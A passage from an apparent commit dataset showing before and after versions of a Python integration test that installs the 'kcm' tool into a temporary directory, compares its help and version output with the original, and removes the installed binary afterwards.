installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
integration.execute("rm", [installed_kcm])
|
<commit_before>from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
<commit_msg>Remove the installed kcm binary after int tests.<commit_after>
|
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
integration.execute("rm", [installed_kcm])
|
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
Remove the installed kcm binary after int tests.
from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
integration.execute("rm", [installed_kcm])
|
<commit_before>from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
<commit_msg>Remove the installed kcm binary after int tests.<commit_after>from . import integration
import os
import tempfile
def test_kcm_install():
# Install kcm to a temporary directory.
install_dir = tempfile.mkdtemp()
integration.execute(integration.kcm(),
["install",
"--install-dir={}".format(install_dir)])
installed_kcm = os.path.join(install_dir, "kcm")
# Check installed kcm executable output against the original script.
assert (integration.execute(installed_kcm, ["--help"]) ==
integration.execute(integration.kcm(), ["--help"]))
assert (integration.execute(installed_kcm, ["--version"]) ==
integration.execute(integration.kcm(), ["--version"]))
integration.execute("rm", [installed_kcm])
|